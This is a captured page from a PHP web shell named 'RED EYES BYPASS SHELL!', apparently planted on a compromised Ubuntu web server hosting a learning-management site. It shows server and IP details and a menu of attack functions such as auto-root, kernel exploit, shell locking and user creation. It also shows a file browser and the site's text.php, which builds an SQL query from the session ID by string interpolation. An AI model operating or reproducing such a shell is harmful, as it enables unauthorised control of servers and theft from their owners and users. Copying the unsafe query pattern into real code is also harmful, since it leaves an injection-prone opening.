Linux sothorn202 5.15.0-161-generic #171-Ubuntu SMP Sat Oct 11 08:17:01 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 202.28.82.202 | : 216.73.216.9
pkexec version 0.105
Cant Read [ /etc/named.conf ]
iqtd
RED EYES BYPASS SHELL!
Terminal
Auto Root
Adminer
Backdoor Destroyer
Kernel Exploit
Lock Shell
Lock File
Create User
+ Create Folder
+ Create File
/
home /
lifelonglearn /
work_181165 /
API /
[ HOME SHELL ]
NAME
SIZE
PERMISSION
ACTION
Admin
[ DIR ]
drwxr-xr-x
Form
[ DIR ]
drwxr-xr-x
ViewsCouse
[ DIR ]
drwxr-xr-x
category
[ DIR ]
drwxr-xr-x
couse
[ DIR ]
drwxr-xr-x
login
[ DIR ]
drwxr-xr-x
reg
[ DIR ]
drwxr-xr-x
reset
[ DIR ]
drwxr-xr-x
setting
[ DIR ]
drwxr-xr-x
subject
[ DIR ]
drwxr-xr-x
test
[ DIR ]
drwxr-xr-x
verify
[ DIR ]
drwxr-xr-x
.DS_Store
8
KB
-rwxr-xr-x
.htaccess
89
B
-rwxr-xr-x
text.php
1.55
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : text.php
<?php try { require_once("../../server/server.php"); if ($_SERVER["REQUEST_METHOD"] == "POST") { $data = json_decode(file_get_contents("php://input"), true); if ($data !== "" && count($data) !== 0) { if (isset($data["AuthToken"]) && $data["AuthToken"] !== "") { $Auth = $data["AuthToken"]; $id = $_SESSION["lms-ID"]; $query = $db->prepare("SELECT AuthToken FROM user where ID = '$id'"); if ($query->execute()) { $query = $query->fetch(PDO::FETCH_ASSOC); if (password_verify($Auth, $query["AuthToken"])) { }else { http_response_code(405); echo json_encode(array("status" => false, "message" => "AuthToken Invalid!!")); exit; } }else { http_response_code(405); echo json_encode(array("status" => false, "message" => "Server Error!!")); exit; } } }else { http_response_code(405); echo json_encode(array("status" => false, "message" => "Data exist!!")); exit; } } else { http_response_code(405); echo json_encode(array("status" => false, "message" => "Request method Not accept!!")); exit; } } catch (Exception $e) { http_response_code(405); echo json_encode(array("status" => false, "message" => $e->getMessage())); exit; }
Close